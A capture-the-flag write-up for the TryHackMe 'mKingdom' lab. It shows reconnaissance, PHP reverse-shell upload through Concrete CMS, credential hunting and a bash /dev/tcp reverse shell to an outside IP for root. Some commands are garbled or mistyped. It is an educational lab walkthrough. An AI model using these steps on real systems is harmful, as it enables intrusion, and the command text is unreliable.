mKingdom(TryHackMe) writeup
The first step is to use the nmap command to scan IP addresses.
nmap -A <target_ip>
Next, access the web server at http://<target_ip>.
Subsequently, we will employ the gobuster tool to perform a brute-force attack on the paths.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://<target_ip> -x html,js,txt,php -t 20
Next, go to the /app directory and you will see a Jump button.
After clicking the Jump button, a pop-up message will be displayed. Click the OK button on this pop-up to proceed.
The web server will redirect you to the /app/castle directory.
And if you look closely, you’ll see that the blog was created by a user named “admin”.
By scrolling down the page, you will find a button labeled “login”.
When you click the login button, the web server will take you to the /app/castle/index.php/login page.
You attempted to log in using the username “admin” and a guessed password.
Upon noticing a CMS icon, a further investigation was conducted using Wappalyzer to gather more information about the web server. It was discovered that Concrete CMS version 8.5.2 is being utilized.
A security assessment of Concrete CMS 8.5.2 revealed a critical vulnerability in the File Manager, exposing the system to potential Remote Code Execution attacks.
Next, you navigated to System & Settings > Allowed File Types to examine the permitted file uploads. Subsequently, we added PHP as an allowed file type.
Next, go to File > Upload File and select a PHP reverse shell file to upload.
After that, use the nc
command to listen for incoming connections from other machines."
nc -lvnp <target_ip>
Execute a shell command to connect to a remote host by clicking the ‘URL to File’ option
Switch back to the terminal and execute the whoami
command to check the current session and user identity.
“After that, use the ls
command to check for interesting directories. An interesting path was found: /etc
. Upon entering this directory, the passwd
file was found. Subsequently, the cat passwd
command was used.
Execute python3 -c 'import pty; pty.spawn("/bin/bash")'
’ to initiate an interactive bash shell session within the current terminal using Python. Subsequently, employ find / -type f -perm -04000 -ls 2>/dev/null
to locate files with SUID permissions. The output will reveal that the ‘toad’ file is owned by the root user.
Execute the cat /home/toad/.bashrc
command to view the contents of the hidden .bashrc
file within the home directory of the usertoad
. This file will reveal a token named PWD_Token, which can then be decoded.
After that, input the decoded password to log in using the username ‘mario’ with the su
command. Then use the commandsudo -l
to display a list of commands that the current user is allowed to run with sudo
privileges.
By executing sudo /usr/bin/id
, you are invoking the id
command with elevated privileges, allowing you to retrieve detailed information about the current user or a specified user as if you were the root user.
Use the command cd ~
to navigate back to the home directory. Then, use the command ls -la
to list all files and directories, including hidden ones. You will see a file named user.txt
. However, when you try to view the contents of this file using cat user.txt
, you will be unable to access it.
By executing python3 -m http.server 80
, a basic HTTP server is initiated on port 80, leveraging Python 3. This server serves the contents of the current directory, making them accessible via a web browser. It’s commonly employed subsequent to downloading the linPEAS script.
Then use the command wget <taget_ip>/linPEAS
to download the linPEAS script from the specified target IP address.
After that, use the commandchmod x+
to add execute permissions to the file or directory.
This command sequence is a common step in a vulnerability assessment or penetration testing engagement. By running linPEAS with root privileges, you gain access to a wide range of system information, including sensitive configuration files. The specific target of /var/www/html/app/castle/application/config/database.php
suggests that the attacker is interested in compromising the database and potentially gaining access to sensitive data.
Following authentication with the obtained credentials, the system’s environment variables are enumerated using the env
command. A specific variable, ‘PWD_token’, is examined. Upon decoding this token, its value is found to be congruent with the user’s username, ‘mario’. This indicates a possible linkage between the user’s identity and the encoded token within the environment.
install PSPY to monitor commands executed with root privileges. Use the command wget <your_ip_address>/pspy64
’ to download the installation file.
By using pspy, we can gain valuable insights into system behavior without requiring root access.
Create a file named counter.sh in the directory /home/benjawan/app/castle/application.
bash -i 1>& /dev/tcp/10.17.18.85 /4567 0>&1
Utilize the network utility nc
to establish a network connection.
nc -lvnp 1338
Employ a command-line tool to modify the /etc/hosts file. This file is essential for Linux and Unix systems to associate domain names, such as ‘mkingdom.thm’, with their corresponding IP addresses.
By executing the whoami
’ command, you can subsequently use cat
to display the contents of the ‘flag’ from the file ‘root.txt’.